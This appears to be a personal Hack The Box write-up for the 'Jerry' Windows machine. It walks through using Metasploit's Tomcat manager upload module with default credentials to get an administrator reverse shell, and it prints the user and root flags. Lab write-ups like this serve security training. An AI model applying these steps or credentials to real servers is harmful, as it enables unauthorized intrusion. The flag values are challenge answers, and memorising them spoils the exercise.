📦
HTB
  • Machines
    • Starting Point Machines
      • Tier 0 Machines
        • Meow
        • Fawn
        • Dancing
        • Redeemer
        • Explosion
        • Preignition
        • Mongod
        • Synced
      • Tier 1 Machines
        • Appointment
        • Sequel
        • Crocodile
        • Responder
        • Three
        • Ignition
        • Bike
        • Funnel
        • Pennyworth
        • Tactics
      • Tier 2 Machines
        • Archetype
        • Oopsie
        • Vaccine
        • Unified
        • Included
        • Markup
        • Base
    • Easy Machines
      • Nibbles
      • Stocker
      • Lame
        • Findings
        • Recon
          • NMAP
          • FTP
          • SSH
          • SMB Client
        • Exploitation
          • FTP
          • Samba
      • Find the easy Pass
      • Weak RSA
      • Jerry (Windows)
        • Recon
        • Enumeration
        • Vulnerabilities
      • You know 0xDiablos
      • Netmon
      • Blue
      • Precious
      • Optimum
      • Cap
      • Knife
    • Medium Machines
      • Under Construction
  • Getting Started Notes
    • Getting Help
    • SSL/TLS Certificates
    • Tutorial Websites
    • Wayback Machine
    • Wappalyzer
    • Google Hacking/Dorking
    • Blogs
    • Youtube Resources
    • Vulnerable Machines
    • Challenges
    • Parrot
    • Common Terms
    • Common Ports
    • SecLists
    • Shells
    • Enumeration Scripts
    • Escalation
    • Downloading files from Target
    • Knowledge Check
Powered by GitBook
On this page
  • Apache
  • Meterpreter
  • User Flag
  • Root Flag
  1. Machines
  2. Easy Machines
  3. Jerry (Windows)

Vulnerabilities

PreviousEnumerationNextYou know 0xDiablos

Last updated 2 years ago

Apache

  • I will start by checking out the webserver from a browser.

http://[Target IP]:8080

  • Looks like I get the default web page for Apache Tomcat version 7.0.88.

  • Let's see if we can find any vulnerabilities for it.

Meterpreter

  • I'll start with looking through metasploit.

msfconsole
search tomcat

  • Exploit 28 looks like it could be something so I will check that one out.

use 28
info

    • It looks like the exploit "should" work.

    • Unfortunately, after inputting the options for the exploit and checking it, it comes back as not exploitable. Let's try some of the others.

  • After doing some further enumerating, I got some credentials that I can use with one of the metasploit exploits. tomcat:s3cret

use multi/http/tomcat_mgr_upload
show options

  • Set the options to the correct parameters.

exploit

  • And now we have a reverse shell into the system.

  • We also have administrator priveleges.

  • Now we can just navigate over to the administrator's profile to find a single text file with both flags.

cd C:\Users\Administrator\Desktop\flags
type "2 for the price of 1.txt"

User Flag

7004dbcef0f854e0fb401875f26ebd00

Root Flag

04a8b36e1545a455393d067e772fe90e

Checking out the link for gives us some info on the exploit.

exploitDB